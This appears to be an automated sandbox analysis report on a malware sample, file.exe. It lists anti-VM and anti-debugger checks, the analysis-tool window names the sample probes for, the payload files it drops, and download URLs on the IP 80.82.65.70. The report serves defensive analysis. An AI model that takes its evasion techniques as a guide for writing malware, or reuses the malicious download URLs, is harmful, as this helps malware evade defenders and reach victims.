Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 8257B0 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 9CEE36 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 9CF1F8 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 9CDB93 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 9F3F4E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: A5BB78 instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009AE7D5 rdtsc 0_2_009AE7D5
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\soft[1] Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1] Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\eJeEe574sR26w1rs\Y-Cleaner.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\eJeEe574sR26w1rs\Bunifu_UI_v1.5.3.dll Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\file.exe TID: 7604 Thread sleep time: -52026s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7608 Thread sleep time: -52026s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7572 Thread sleep count: 160 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7572 Thread sleep count: 179 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7572 Thread sleep count: 176 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7572 Thread sleep count: 176 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7572 Thread sleep count: 56 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7572 Thread sleep count: 36 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7572 Thread sleep count: 55 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7572 Thread sleep count: 81 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7572 Thread sleep count: 79 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7572 Thread sleep count: 80 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7572 Thread sleep count: 81 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7680 Thread sleep time: -36000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7612 Thread sleep count: 33 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7612 Thread sleep time: -66033s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7588 Thread sleep time: -34017s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7596 Thread sleep time: -50025s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7592 Thread sleep time: -38019s >= -30000s Jump to behavior
Source: file.exe, file.exe, 00000000.00000002.2403256104.00000000009AE000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Amcache.hve.6.dr Binary or memory string: VMware
Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.6.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.6.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.6.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.6.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: file.exe, 00000000.00000002.2403940495.0000000000FA7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2405607340.00000000055E8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.2405607340.00000000055D0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: Amcache.hve.6.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.6.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr Binary or memory string: vmci.sys
Source: Amcache.hve.6.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.6.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.6.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.6.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr Binary or memory string: VMware20,1
Source: Amcache.hve.6.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.6.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.6.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.6.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.6.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: file.exe, 00000000.00000002.2403256104.00000000009AE000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Amcache.hve.6.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\Desktop\file.exe File opened: NTICE
Source: C:\Users\user\Desktop\file.exe File opened: SICE
Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009AE7D5 rdtsc 0_2_009AE7D5
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040A54A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0040A54A
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402A20 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree, 0_2_00402A20
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_10007A76 mov eax, dword ptr fs:[00000030h] 0_2_10007A76
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_10005F25 mov eax, dword ptr fs:[00000030h] 0_2_10005F25
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00EECABB push dword ptr fs:[00000030h] 0_2_00EECABB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04B50D90 mov eax, dword ptr fs:[00000030h] 0_2_04B50D90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04B5092B mov eax, dword ptr fs:[00000030h] 0_2_04B5092B
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402EC0 SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,HeapFree,VirtualAlloc, 0_2_00402EC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004099EA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_004099EA
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040A54A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0040A54A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040CDA3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0040CDA3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040A6E0 SetUnhandledExceptionFilter, 0_2_0040A6E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_10002ADF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_10002ADF
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04B59C51 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_04B59C51
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04B5A7B1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_04B5A7B1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04B5D00A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_04B5D00A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04B5A947 SetUnhandledExceptionFilter, 0_2_04B5A947
Source: file.exe, file.exe, 00000000.00000002.2403256104.00000000009AE000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: z?wProgram Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_04D196AC cpuid 0_3_04D196AC
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004107E2 GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, 0_2_004107E2
AV process strings found (often used to terminate AV products)
Source: Amcache.hve.6.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.6.dr Binary or memory string: MsMpEng.exe
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1572088 Sample: file.exe Startdate: 10/12/2024 Architecture: WINDOWS Score: 100 26 Malicious sample detected (through community Yara rule) 2->26 28 Antivirus / Scanner detection for submitted sample 2->28 30 Multi AV Scanner detection for dropped file 2->30 32 5 other signatures 2->32 6 file.exe 31 2->6         started        process3 dnsIp4 24 80.82.65.70, 49730, 80 INT-NETWORKSC Netherlands 6->24 14 C:\Users\user\AppData\Local\...\Y-Cleaner.exe, PE32 6->14 dropped 16 C:\Users\user\...\Bunifu_UI_v1.5.3.dll, PE32 6->16 dropped 18 C:\Users\user\AppData\Local\...\soft[1], PE32 6->18 dropped 20 C:\Users\user\AppData\Local\...\dll[1], PE32 6->20 dropped 34 Detected unpacking (changes PE section rights) 6->34 36 Tries to detect sandboxes and other dynamic analysis tools (window names) 6->36 38 Tries to evade debugger and weak emulator (self modifying code) 6->38 40 4 other signatures 6->40 11 WerFault.exe 21 16 6->11         started        file5 signatures6 process7 file8 22 C:\ProgramData\Microsoft\...\Report.wer, Unicode 11->22 dropped
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
80.82.65.70
 unknown Netherlands
202425 INT-NETWORKSC false

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://80.82.65.70/soft/download false
    		high
    http://80.82.65.70/add?substr=mixtwo&s=three&sub=emp false
      		high
      http://80.82.65.70/dll/download false
        		high
        http://80.82.65.70/dll/key false
          		high
          http://80.82.65.70/files/download false
            		high